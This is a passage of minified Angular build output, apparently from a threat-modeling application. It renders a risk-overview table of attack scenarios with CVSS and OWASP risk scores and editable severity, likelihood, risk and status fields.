",re(2,1,"general.Number")," "))}function Nyt(t,a){if(1&t&&(m(0,"td",44),s(1),u()),2&t){const e=a.$implicit;C(1),ct(" ",e.Number," ")}}function Lyt(t,a){1&t&&(m(0,"th",43),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Name")," "))}function zyt(t,a){if(1&t&&(m(0,"td",44),s(1),u()),2&t){const e=a.$implicit;C(1),ct(" ",e.GetProperty("Name")," ")}}function Wyt(t,a){1&t&&(m(0,"th",43),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Elements")," "))}function Fyt(t,a){if(1&t&&(m(0,"td",44),s(1),u()),2&t){const e=a.$implicit,i=B(2);Ct("selected-cell",i.IsElementSelected(e)),C(1),ct(" ",i.GetTargets(e)," ")}}function Vyt(t,a){1&t&&(m(0,"th",43),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.View")," "))}function Byt(t,a){if(1&t&&(m(0,"td",44),s(1),u()),2&t){const e=a.$implicit,i=B(2);C(1),ct(" ",i.GetViewName(e)," ")}}function Hyt(t,a){1&t&&(m(0,"th",43),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"report.CvssVector")," "))}function Uyt(t,a){if(1&t&&(m(0,"td",44),s(1),u()),2&t){const e=a.$implicit,i=B(2);C(1),ct(" ",i.GetCvssVector(e)," ")}}function qyt(t,a){1&t&&(m(0,"th",45),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"report.CvssScore")," "))}function Gyt(t,a){if(1&t&&(m(0,"td",46),s(1),u()),2&t){const e=a.$implicit;C(1),ct(" ",null==e.ScoreCVSS?null:e.ScoreCVSS.Score," ")}}function jyt(t,a){1&t&&(m(0,"th",43),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"report.OwaspRRVector")," "))}function Qyt(t,a){if(1&t&&(m(0,"td",44),s(1),u()),2&t){const e=a.$implicit,i=B(2);C(1),ct(" ",i.GetOwaspRRVector(e)," ")}}function $yt(t,a){1&t&&(m(0,"th",45),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"report.OwaspRRScore")," "))}function Kyt(t,a){if(1&t&&(m(0,"td",46),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2);C(1),ct(" ",re(2,1,i.GetOwaspRRScore(e))," ")}}function Xyt(t,a){1&t&&(m(0,"th",43),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"properties.Severity")," "))}function Yyt(t,a){if(1&t&&(m(0,"option",48),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(3);V("value",e),C(1),ke(re(2,2,i.GetSeverityTypeName(e)))}}function Jyt(t,a){if(1&t){const e=Ye();m(0,"td",44),s(1,"\n                      "),m(2,"select",47),he("ngModelChange",function(n){return Me(be(e).$implicit.Severity=n)})("change",function(){return Me(be(e).$implicit.CalculateRisk())}),s(3,"\n                        "),m(4,"option",48),s(5),oe(6,"translate"),u(),s(7,"\n                        "),ne(8,Yyt,3,4,"option",49),s(9,"\n                      "),u(),s(10,"\n                    "),u()}if(2&t){const e=a.$implicit,i=B(2);C(2),V("ngModel",e.Severity),C(2),V("value",0),C(1),ke(re(6,4,"properties.selectNone")),C(3),V("ngForOf",i.GetSeverityTypes())}}function Zyt(t,a){1&t&&(m(0,"th",43),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Likelihood")," "))}function ebt(t,a){if(1&t&&(m(0,"option",48),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(3);V("value",e),C(1),ke(re(2,2,i.GetLMHName(e)))}}function tbt(t,a){if(1&t){const e=Ye();m(0,"td",44),s(1,"\n                      "),m(2,"select",47),he("ngModelChange",function(n){return Me(be(e).$implicit.Likelihood=n)})("change",function(){return Me(be(e).$implicit.CalculateRisk())}),s(3,"\n                        "),m(4,"option",48),s(5),oe(6,"translate"),u(),s(7,"\n                        "),ne(8,ebt,3,4,"option",49),s(9,"\n                      "),u(),s(10,"\n                    "),u()}if(2&t){const e=a.$implicit,i=B(2);C(2),V("ngModel",e.Likelihood),C(2),V("value",0),C(1),ke(re(6,4,"properties.selectNone")),C(3),V("ngForOf",i.GetLMHValues())}}function ibt(t,a){1&t&&(m(0,"th",43),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"properties.Risk")," "))}function abt(t,a){if(1&t&&(m(0,"option",48),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(3);V("value",e),C(1),ke(re(2,2,i.GetSeverityTypeName(e)))}}function nbt(t,a){if(1&t){const e=Ye();m(0,"td",44),s(1,"\n                      "),m(2,"select",50),he("ngModelChange",function(n){return Me(be(e).$implicit.Risk=n)}),s(3,"\n                        "),ne(4,abt,3,4,"option",49),s(5,"\n                      "),u(),s(6,"\n                    "),u()}if(2&t){const e=a.$implicit,i=B(2);C(2),V("ngModel",e.Risk),C(2),V("ngForOf",i.GetSeverityTypes())}}function obt(t,a){1&t&&(m(0,"th",43),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"properties.Status")," "))}function rbt(t,a){if(1&t&&(m(0,"option",48),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(3);V("value",e),C(1),ke(re(2,2,i.GetThreatStateName(e)))}}function sbt(t,a){if(1&t){const e=Ye();m(0,"td",44),s(1,"\n                      "),m(2,"select",51),he("ngModelChange",function(n){return Me(be(e).$implicit.ThreatState=n)}),s(3,"\n                        "),ne(4,rbt,3,4,"option",49),s(5,"\n                      "),u(),s(6,"\n                    "),u()}if(2&t){const e=a.$implicit,i=B(2);C(2),V("ngModel",e.ThreatState),C(2),V("ngForOf",i.GetThreatStates())}}function cbt(t,a){1&t&&(m(0,"th",52),s(1," "),u())}function lbt(t,a){if(1&t){const e=Ye();m(0,"td",44),s(1," "),m(2,"mat-icon",53),he("click",function(n){const c=be(e).$implicit;return Me(B(2).OpenContextMenu(n,c))}),oe(3,"translate"),s(4,"more_vert"),u(),s(5," "),u()}2&t&&(C(2),at("matTooltip",re(3,1,"general.More")))}function dbt(t,a){1&t&&it(0,"tr",54)}function mbt(t,a){if(1&t){const e=Ye();m(0,"tr",55),he("click",function(){const r=be(e).$implicit;return Me(B(2).SelectScenario(r))})("dblclick",function(){const r=be(e).$implicit;return Me(B(2).OnScenarioDblClick(r))})("contextmenu",function(n){const c=be(e).$implicit;return Me(B(2).OpenContextMenu(n,c))}),s(1,"\n                  "),u()}if(2&t){const e=a.$implicit;Ct("selected-entry",B(2).IsScenarioSelected(e)),V("id",e.ID)}}function ubt(t,a){if(1&t){const e=Ye();m(0,"tr",56),s(1,"\n                    "),m(2,"td",57),he("contextmenu",function(n){return be(e),Me(B(2).OpenContextMenu(n,null))}),s(3),oe(4,"translate"),u(),s(5,"\n                  "),u()}2&t&&(C(3),ke(re(4,1,"pages.modeling.threattable.noThreats")))}function hbt(t,a){if(1&t&&(m(0,"span",60),s(1),u()),2&t){const e=B().item;C(1),ke(e.GetProperty("Name"))}}function fbt(t,a){1&t&&(m(0,"span",60),s(1),oe(2,"translate"),u()),2&t&&(C(1),ke(re(2,1,"pages.modeling.threattable.noEntrySelected")))}function pbt(t,a){if(1&t){const e=Ye();s(0,"\n                    "),ne(1,hbt,2,1,"span",58),s(2," \n                    "),ne(3,fbt,3,3,"span",58),s(4,"\n                    "),m(5,"button",59),he("click",function(){const r=be(e).item;return Me(B(2).OnScenarioDblClick(r))}),s(6,"\n                      "),m(7,"mat-icon"),s(8,"edit"),u(),s(9,"\n                      "),m(10,"span"),s(11),oe(12,"translate"),u(),s(13,"\n                    "),u(),s(14,"\n                  ")}if(2&t){const e=a.item;C(1),V("ngIf",e),C(2),V("ngIf",!e),C(2),V("disabled",!e),C(6),ke(re(12,4,"pages.modeling.threattable.editEntry"))}}function _bt(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n              "),ne(2,Pyt,2,1,"h2",11),s(3,"\n              "),m(4,"span",13),s(5),oe(6,"translate"),oe(7,"translate"),u(),s(8,"\n              "),m(9,"input",14),he("keyup",function(n){return be(e),Me(B().ApplyScenarioFilter(n))}),oe(10,"translate"),u(),s(11,"\n              "),m(12,"div",15),s(13,"\n                "),m(14,"table",16,17),s(16,"\n                  "),bt(17,18),s(18,"\n                    "),ne(19,Oyt,3,3,"th",19),s(20,"\n                    "),ne(21,Nyt,2,1,"td",20),s(22,"\n                  "),Mt(),s(23,"\n                  "),bt(24,21),s(25,"\n                    "),ne(26,Lyt,3,3,"th",19),s(27,"\n                    "),ne(28,zyt,2,1,"td",20),s(29,"\n                  "),Mt(),s(30,"\n                  "),bt(31,22),s(32,"\n                    "),ne(33,Wyt,3,3,"th",19),s(34,"\n                    "),ne(35,Fyt,2,3,"td",23),s(36,"\n                  "),Mt(),s(37,"\n                  "),bt(38,24),s(39,"\n                    "),ne(40,Vyt,3,3,"th",19),s(41,"\n                    "),ne(42,Byt,2,1,"td",20),s(43,"\n                  "),Mt(),s(44,"\n                  "),bt(45,25),s(46,"\n                    "),ne(47,Hyt,3,3,"th",19),s(48,"\n                    "),ne(49,Uyt,2,1,"td",20),s(50,"\n                  "),Mt(),s(51,"\n                  "),bt(52,26),s(53,"\n                    "),ne(54,qyt,3,3,"th",27),s(55,"\n                    "),ne(56,Gyt,2,1,"td",28),s(57,"\n                  "),Mt(),s(58,"\n                  "),bt(59,29),s(60,"\n                    "),ne(61,jyt,3,3,"th",19),s(62,"\n                    "),ne(63,Qyt,2,1,"td",20),s(64,"\n                  "),Mt(),s(65,"\n                  "),bt(66,30),s(67,"\n                    "),ne(68,$yt,3,3,"th",27),s(69,"\n                    "),ne(70,Kyt,3,3,"td",28),s(71,"\n                  "),Mt(),s(72,"\n                  "),bt(73,31),s(74,"\n                    "),ne(75,Xyt,3,3,"th",19),s(76,"\n                    "),ne(77,Jyt,11,6,"td",20),s(78,"\n                  "),Mt(),s(79,"\n                  "),bt(80,32),s(81,"\n                    "),ne(82,Zyt,3,3,"th",19),s(83,"\n                    "),ne(84,tbt,11,6,"td",20),s(85,"\n                  "),Mt(),s(86,"\n                  "),bt(87,33),s(88,"\n                    "),ne(89,ibt,3,3,"th",19),s(90,"\n                    "),ne(91,nbt,7,2,"td",20),s(92,"\n                  "),Mt(),s(93,"\n                  "),bt(94,34),s(95,"\n                    "),ne(96,obt,3,3,"th",19),s(97,"\n                    "),ne(98,sbt,7,2,"td",20),s(99,"\n                  "),Mt(),s(100,"\n                  "),bt(101,35),s(102,"\n                    "),ne(103,cbt,2,0,"th",36),s(104,"\n                    "),ne(105,lbt,6,3,"td",20),s(106,"\n                  "),Mt(),s(107,"\n              \n                  "),ne(108,dbt,1,0,"tr",37),s(109,"\n                  "),ne(110,mbt,2,3,"tr",38),s(111,"\n                  "),ne(112,ubt,6,3,"tr",39),s(113,"\n                "),u(),s(114,"\n                "),it(115,"div",40),s(116," \n                "),m(117,"mat-menu",null,41),s(119," \n                  "),ne(120,pbt,15,6,"ng-template",42),s(121," \n                "),u(),s(122,"\n              "),u(),s(123,"\n            "),Mt()}if(2&t){const e=Ti(118),i=B();C(2),V("ngIf",i.selectedNode),C(3),J_("",re(6,25,"pages.dashboard.ThreatOverview"),": ",i.AttackScenarios.length," ",re(7,27,"general.AttackScenarios"),""),C(4),ri("color",i.theme.IsDarkMode?"white":"black"),Ct("bg-color-light2",!i.theme.IsDarkMode)("bg-color-dark2",i.theme.IsDarkMode),at("placeholder",re(10,29,"pages.modeling.filter")),V("spellcheck",i.dataService.HasSpellCheck),C(5),Ct("bg-color-light3",!i.theme.IsDarkMode)("bg-color-dark3",i.theme.IsDarkMode),V("dataSource",i.dataSourceScenarios),C(94),V("matHeaderRowDef",i.displayedScenarioColumns)("matHeaderRowDefSticky",!0),C(2),V("matRowDefColumns",i.displayedScenarioColumns),C(5),ri("left",i.menuTopLeftPosition.x)("top",i.menuTopLeftPosition.y),V("matMenuTriggerFor",e)}}const gbt=[{path:"risk",component:(()=>{class t extends CT{constructor(e,i,n,r,c,d){super(),this.theme=e,this.dataService=i,this.translate=n,this.locStorage=r,this.dialog=c,this.router=d,this._attackScenarios=[],this.menuTopLeftPosition={x:"0",y:"0"},this.displayedScenarioColumns=[],this.dataService.Project||this.router.navigate(["/home"],{queryParams:{origin:"risk"}})}get selectedNode(){return this._selectedNode}set selectedNode(e){if(this._selectedNode=e,this.AttackScenarios=[],e){const i=[],n=r=>{r.data instanceof Rc?i.push(r.data):r.children&&r.children.forEach(c=>n(c))};n(e),this.AttackScenarios=i}}get sortScenarios(){return this._sortScenarios}set sortScenarios(e){this._sortScenarios=e,this.dataSourceScenarios&&(this.dataSourceScenarios.sort=e)}get AttackScenarios(){return this._attackScenarios}set AttackScenarios(e){this._attackScenarios=e;const r=["number","name","elements"];[...new Set(e.map(c=>c.ViewID))].length>1&&r.push("view"),e.some(c=>null!=this.GetCvssVector(c))&&r.push("cvssVector"),e.some(c=>c.ScoreCVSS&&c.ScoreCVSS.Score)&&r.push("cvssScore"),e.some(c=>null!=this.GetOwaspRRVector(c))&&r.push("owaspVector"),e.some(c=>c.ScoreOwaspRR&&c.ScoreOwaspRR.Score)&&r.push("owaspScore"),r.push("severity","likelihood","risk","status","more"),this.displayedScenarioColumns=r,this.dataSourceScenarios=new Ld(e),this.dataSourceScenarios.sort=this.sortScenarios,this.dataSourceScenarios.sortingDataAccessor=(c,d)=>{var T,k,q;return"number"==d?Number(c.Number):"name"==d?c.Name:"elements"==d?this.GetTargets(c):"view"==d?this.dataService.Project.GetView(c.ViewID).Name:"severity"==d?c.Severity:"cvssVector"==d?null===(T=c.ScoreCVSS)||void 0===T?void 0:T.Vector:"cvssScore"==d?null===(k=c.ScoreCVSS)||void 0===k?void 0:k.Score:"owaspVector"==d?this.GetOwaspRRVector(c):"owaspScore"==d?null===(q=c.ScoreOwaspRR)||void 0===q?void 0:q.Score:"likelihood"==d?c.Likelihood:"risk"==d?c.Risk:"status"==d?c.ThreatState:void console.error("Missing sorting header",d)},this.dataSourceScenarios.filterPredicate=(c,d)=>{var T,k;let q=d.trim().toLowerCase(),Y=c.Name.toLowerCase().indexOf(q);return-1==Y&&(Y=null===(T=c.AttackVector)||void 0===T?void 0:T.Name.toLowerCase().indexOf(q)),-1==Y&&(Y=null===(k=this.GetTargets(c))||void 0===k?void 0:k.toLowerCase().indexOf(q)),null!=Y&&-1!=Y},this.sortScenarios&&this.sortScenarios.sortChange.emit(this.sortScenarios)}get selectedScenario(){return this._selectedScenario}set selectedScenario(e){this._selectedScenario=e}ngAfterViewInit(){setTimeout(()=>{this.createNodes(),this.selectedNode=this.nodes[0]})}onKeyDown(e){var i;if(!this.IsAttackScenario()&&"TEXTAREA"!=(null===(i=document.activeElement)||void 0===i?void 0:i.tagName)){if(this.selectedScenario){const n=(r,c)=>{this.SelectScenario(r[c]);const d=this.rows.find(T=>T.nativeElement.id===r[c].ID);null==d||d.nativeElement.scrollIntoView({block:"center",behavior:"smooth"})};if("ArrowDown"==e.key){const r=this.dataSourceScenarios.sortData(this.dataSourceScenarios.filteredData,this.sortScenarios),c=r.indexOf(this.selectedScenario);c<r.length-1&&n(r,c+1)}else if("ArrowUp"==e.key){const r=this.dataSourceScenarios.sortData(this.dataSourceScenarios.filteredData,this.sortScenarios),c=r.indexOf(this.selectedScenario);c>0&&n(r,c-1)}}["ArrowDown","ArrowUp"].includes(e.key)&&(e.preventDefault(),e.stopImmediatePropagation())}}ApplyScenarioFilter(e){this.dataSourceScenarios.filter=e.target.value.trim().toLowerCase()}OnScenarioDblClick(e){this.dialog.OpenAttackScenarioDialog(e,!1,this.dataSourceScenarios.sortData(this.dataSourceScenarios.filteredData,this.sortScenarios))}IsAttackScenario(){var e;return(null===(e=this.selectedNode)||void 0===e?void 0:e.data)instanceof Rc}IsScenarioSelected(e){return this.selectedScenario==e}SelectScenario(e){this.selectedScenario=e}IsElementSelected(e){return e&&this.selectedScenario&&e.Targets.some(i=>this.selectedScenario.Targets.includes(i))}GetTargets(e){return e.Targets.filter(i=>i).map(i=>i.GetProperty("Name")).join(", ")}GetViewName(e){var i;return null===(i=this.dataService.Project.GetView(e.ViewID))||void 0===i?void 0:i.Name}GetCvssVector(e){if(e.ScoreCVSS){const i=Wm.GetVector(e.ScoreCVSS);if((null==i?void 0:i.length)>8)return i}return null}GetOwaspRRVector(e){return e.ScoreOwaspRR?IT.GetVector(e.ScoreOwaspRR):null}GetOwaspRRScore(e){var i;return null!==(i=e.ScoreOwaspRR)&&void 0!==i&&i.Score?vn.ToString(e.ScoreOwaspRR.Score):null}GetThreatStates(){return ku.GetThreatStates()}GetThreatStateName(e){return ku.ToString(e)}GetSeverityTypes(){return vn.GetTypesDashboard()}GetSeverityTypeName(e){return vn.ToString(e)}GetLMHValues(){return An.GetKeys()}GetLMHName(e){return An.ToString(e)}OpenContextMenu(e,i){e.preventDefault(),this.menuTopLeftPosition.x=e.clientX+"px",this.menuTopLeftPosition.y=e.clientY+"px",this.matMenuTrigger.menuData={item:i},this.matMenuTrigger.openMenu()}GetSplitSize(e,i,n){let r=this.locStorage.Get(si.PAGE_RISK_SPLIT_SIZE_X+e.toString());return null!=r?Number(JSON.parse(r)[i]):n}OnSplitSizeChange(e,i){this.locStorage.Set(si.PAGE_RISK_SPLIT_SIZE_X+i.toString(),JSON.stringify(e.sizes))}createNodes(){const e=this.nodes;this.nodes=[];const i=this.dataService.Project,r={name:()=>this.translate.instant("general.RiskAssessment"),icon:"crisis_alert",canSelect:!0,hasMenu:!0,children:[]},c=[];i.GetSysContext().ContextDiagram&&c.push(i.GetSysContext().ContextDiagram),i.GetSysContext().UseCaseDiagram&&c.push(i.GetSysContext().UseCaseDiagram),i.GetDevices().forEach(d=>{d.HardwareDiagram&&c.push(d.HardwareDiagram),d.SoftwareStack&&c.push(d.SoftwareStack),d.ProcessStack&&c.push(d.ProcessStack)}),i.GetMobileApps().forEach(d=>{d.SoftwareStack&&c.push(d.SoftwareStack),d.ProcessStack&&c.push(d.ProcessStack)}),i.GetDFDiagrams().forEach(d=>c.push(d)),c.forEach(d=>{const T=i.GetAttackScenariosApplicable().filter(k=>k.ViewID==d.ID);if(T.length>0){const k={name:()=>d.Name,canSelect:!0,children:[]};T.forEach(q=>k.children.push((d=>({name:()=>"AS"+d.Number+") "+d.Name,canSelect:!0,data:d}))(q))),r.children.push(k)}}),this.nodes.push(r),xa.TransferExpandedState(e,this.nodes),this.navTree.SetNavTreeData(this.nodes)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Sn),Ee(_r),Ee(Wn),Ee(Oo))},t.\u0275cmp=Wt({type:t,selectors:[["app-risk-overview"]],viewQuery:function(e,i){if(1&e&&(Mi(Syt,5),Mi(po,5),Mi(xc,5,mi)),2&e){let n;Vt(n=Bt())&&(i.sortScenarios=n.first),Vt(n=Bt())&&(i.matMenuTrigger=n.first),Vt(n=Bt())&&(i.rows=n)}},hostBindings:function(e,i){1&e&&he("keydown",function(r){return i.onKeyDown(r)},0,Qc)},features:[ci],decls:35,vars:22,consts:[[1,"website-container"],[1,"drawer-container"],["mode","side","opened","",2,"border-right-width","0px"],["selectedRoute","/risk",2,"width","100%","height","calc(100% - 20px)",3,"sameRoute"],["direction","horizontal","unit","pixel",3,"gutterSize","restrictMove","dragEnd"],[3,"size","visible","order"],[3,"activeNode","selectedNodeChanged"],["navTree",""],[3,"size","order"],[2,"margin-left","10px","height","calc(100% - 22px)"],["style","height: 100%; display: block; margin: 10px 10px 0 0;",3,"attackScenario",4,"ngIf"],[4,"ngIf"],[2,"height","100%","display","block","margin","10px 10px 0 0",3,"attackScenario"],[2,"margin-left","5px","margin-top","2px"],["matInput","",1,"filterInput",3,"spellcheck","placeholder","keyup"],[2,"height","calc(100% - 70px)"],["mat-table","","matSort","","matSortActive","number","matSortDirection","asc","matSortDisableClear","",2,"width","100%","overflow","auto","display","block","height","calc(100% - 10px)",3,"dataSource"],["scenariotable","matSort"],["matColumnDef","number"],["mat-header-cell","","mat-sort-header","",4,"matHeaderCellDef"],["mat-cell","",4,"matCellDef"],["matColumnDef","name"],["matColumnDef","elements"],["mat-cell","",3,"selected-cell",4,"matCellDef"],["matColumnDef","view"],["matColumnDef","cvssVector"],["matColumnDef","cvssScore"],["mat-header-cell","","mat-sort-header","","style","text-align: center;",4,"matHeaderCellDef"],["mat-cell","","style","text-align: center;",4,"matCellDef"],["matColumnDef","owaspVector"],["matColumnDef","owaspScore"],["matColumnDef","severity"],["matColumnDef","likelihood"],["matColumnDef","risk"],["matColumnDef","status"],["matColumnDef","more"],["mat-header-cell","",4,"matHeaderCellDef"],["mat-header-row","","style","height: 30px;",4,"matHeaderRowDef","matHeaderRowDefSticky"],["mat-row","",3,"id","selected-entry","click","dblclick","contextmenu",4,"matRowDef","matRowDefColumns"],["class","mat-row",4,"matNoDataRow"],[2,"visibility","hidden","position","fixed",3,"matMenuTriggerFor"],["rightMenu","matMenu"],["matMenuContent",""],["mat-header-cell","","mat-sort-header",""],["mat-cell",""],["mat-header-cell","","mat-sort-header","",2,"text-align","center"],["mat-cell","",2,"text-align","center"],[2,"width","80px",3,"ngModel","ngModelChange","change"],[3,"value"],[3,"value",4,"ngFor","ngForOf"],[2,"width","80px","pointer-events","none",3,"ngModel","ngModelChange"],[2,"width","130px",3,"ngModel","ngModelChange"],["mat-header-cell",""],["matTooltipShowDelay","1000",3,"matTooltip","click"],["mat-header-row","",2,"height","30px"],["mat-row","",3,"id","click","dblclick","contextmenu"],[1,"mat-row"],["colspan","12",1,"mat-cell",3,"contextmenu"],["style","margin-left: 20px; margin-right: 20px;",4,"ngIf"],["mat-menu-item","",3,"disabled","click"],[2,"margin-left","20px","margin-right","20px"]],template:function(e,i){1&e&&(m(0,"div",0),s(1,"\n  "),m(2,"mat-drawer-container",1),s(3,"\n    "),m(4,"mat-drawer",2),s(5,"\n      "),m(6,"app-side-nav",3),he("sameRoute",function(){return i.OnSameRoute()}),u(),s(7,"\n    "),u(),s(8,"\n\n    "),m(9,"mat-drawer-content"),s(10,"\n      "),m(11,"as-split",4),he("dragEnd",function(r){return i.OnSplitSizeChange(r,1)}),s(12,"\n        "),m(13,"as-split-area",5),s(14,"\n          "),m(15,"app-nav-tree",6,7),he("selectedNodeChanged",function(r){return i.selectedNode=r}),u(),s(17,"\n        "),u(),s(18,"\n        "),m(19,"as-split-area",8),s(20,"\n          "),m(21,"div",9),s(22,"\n            "),ne(23,kyt,1,1,"app-attack-scenario",10),s(24,"\n            "),ne(25,_bt,124,31,"ng-container",11),s(26,"\n          "),u(),s(27,"\n        "),u(),s(28,"\n      "),u(),s(29,"\n    "),u(),s(30,"\n  "),u(),s(31,"\n  "),it(32,"app-status-bar"),s(33,"\n"),u(),s(34,"\n")),2&e&&(C(9),Ct("splitter-light2",!i.theme.IsDarkMode)("splitter-dark2",i.theme.IsDarkMode),C(2),V("gutterSize",3)("restrictMove",!0),C(2),Ct("splitter-light1",!i.theme.IsDarkMode)("splitter-dark1",i.theme.IsDarkMode),V("size",i.GetSplitSize(1,0,350))("visible",i.showLeftBar)("order",1),C(2),V("activeNode",i.selectedNode),C(4),Ct("bg-color-light3",!i.theme.IsDarkMode)("bg-color-dark3",i.theme.IsDarkMode),V("size",i.GetSplitSize(1,1,"*"))("order",2),C(4),V("ngIf",i.IsAttackScenario()),C(2),V("ngIf",i.selectedNode&&null==i.selectedNode.data))},dependencies:[Zi,Ri,pm,_m,Td,Ta,Ea,Zh,xp,oa,_u,gu,Od,Xa,Xo,qo,po,Zc,Pa,Au,Tu,jh,xm,Dm,Du,Eu,wm,Qh,xc,yp,il,Mp,_f,gf,df,lM,Xi],styles:[".primary-color[_ngcontent-%COMP%], .selected-entry[_ngcontent-%COMP%]   td[_ngcontent-%COMP%], .selected-cell[_ngcontent-%COMP%], .selected-item[_ngcontent-%COMP%]   td[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}.primary-color[_ngcontent-%COMP%], .selected-entry[_ngcontent-%COMP%]   td[_ngcontent-%COMP%], .selected-cell[_ngcontent-%COMP%], .selected-item[_ngcontent-%COMP%]   td[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     